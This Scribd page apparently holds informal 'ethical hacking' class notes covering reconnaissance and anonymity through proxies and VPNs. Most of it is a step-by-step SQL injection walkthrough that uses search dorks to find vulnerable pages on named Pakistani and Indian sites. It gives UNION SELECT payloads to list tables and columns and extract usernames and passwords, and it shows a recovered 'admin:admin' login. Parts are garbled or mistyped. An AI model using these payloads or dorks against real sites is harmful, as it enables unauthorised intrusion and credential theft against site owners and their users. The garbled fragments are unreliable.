Scribd
Upload
296 views3 pages

Ethical Hacking

This document provides instructions for gathering information about websites and databases using techniques like DNS lookups, reverse IP mapping, and information gathering using search engines and plugins. It then describes how to hack into websites using basic and advanced SQL injection methods like inferring the database name, tables, columns, and extracting data like usernames and passwords. The steps involve finding login pages, adding SQL code to URLs, and using tools like SQLMap to automate the process.

Uploaded by

Prachi Tripathi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
296 views3 pages

Ethical Hacking

This document provides instructions for gathering information about websites and databases using techniques like DNS lookups, reverse IP mapping, and information gathering using search engines and plugins. It then describes how to hack into websites using basic and advanced SQL injection methods like inferring the database name, tables, columns, and extracting data like usernames and passwords. The steps involve finding login pages, adding SQL code to URLs, and using tools like SQLMap to automate the process.

Uploaded by

Prachi Tripathi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

www.allwhois.

com
2.Nslookup - IP from cmd
cmd>nslookup facebook.com

3.Reverse IP mapping - doamins hosted on the same server


reverse Email lookup toop (you get signal)
search email

4.Info gathering of website using plugin


wapplyser
Apache/ Unix/ Gnix/ Litespeed - LINUx
Microsoft/ IIS/ Asp.net - WIN OS
glassfish - Java OS

5.Proxy Servers - Opern Servers


www.kproxy.com
www.boomproxy.com
www.hidemy*.com - Maintain logs
VPN - Virtual Private Network
http://- 443 - No logs
http://vpngate.net/ - download vpn client
whatismyip.com

6.Info gathering using search engine


www.kartoo.com
www.maltego.org
www.shodan.io

PORTS - tunnels (65500+)


Physical -USB, Serial Port
Virtual - 1- 65535
https:// - 443
http:// - 80
ftp - 21
smtp - 25
POP - 110

to hack a website (sunny_3459@yahoo.in)

1.Basic SQL Injection / Authentication BYpass


SQL -
sunny sunny
select * from member where userid ='sunny'
and password='sunny'
step 1: find out login page of website
site:iisc.ac.in
pk inurl:/login
pk inurl:/admin
pk inurl:/cpane
pk inuel:/cp

iisc.ac.in intext:username
intext

guessing useselest 1 * from member where userid ='admin, and a

2.Advanced SQL Injection


select - select info from database
insert - insert values into database
update - update values into databse
delete - delete values
create - create table
drop - drop table
order by - sorting columns
schema - structure of data base
' - starting of SQL values/commands

http://site.com/news.php?id=1-
http://site.com/news/10
news title:
news content:
news author:
? - asking data from database

step 1: find out link which contains ?id=10


pk inurl:php?id=
pk inural:asp?id=
pk inural:a

com.pk
gov.pk

step 2: add ' after ?id=10


http://citicollege.edu.edu.pk/main.php?Id=1'
http://tncgroup.pk/content.php?Id=2'

blank page = error page = SQL Injection Vulnerable

step 3:find out number of vulnerable links:


http://citicollege.edu.pk/main.php?Id=1'
id=1 to id=1000 --
-- : end of query
number of vulnerable links are 8

step 4:find out link from which we can select data:


http://citicollege.edu.pk/main.php?
Id=-1 union all select 1,2,3,4,5,6,7,8 --
we can select data from 2 & 6

step 5:finding out databse, tables & columns


Id=-1 union all select 1,database(),3,4,5,6,7,8 --
DB: citioffi_college
schema - structure of tables & columns
information_schema - stores info
table_name
information_schema.tables - table structure
column_name
information_schema.columns - column structure
Id=-1 union all select
1, table_name ,3,4,5,6,7,8 from
information_schema.tables --

for complicated websites


Id=-1 union all select
1, table_group_concat(table_name) ,3,4,5,6,7,8 from
information_schema.tables --

table_schema=database() --
lito_user

for complicated websites


Id=-1 union all select
1, table_group_concat(column_name) ,3,4,5,6,7,8 from
information_schema.columns
where table_schema='lito_user' --

table: lito_user
columns: Id,Username,Password,FullName,Email

step 6:find out row values


Id=-1 union all select 1,UserName

Id=-1 union all select 1,Password,3,4,5,6,7,8 from lito_user --


admin:admin

softwares:
Havij
SQL Injector
SQLMap

You might also like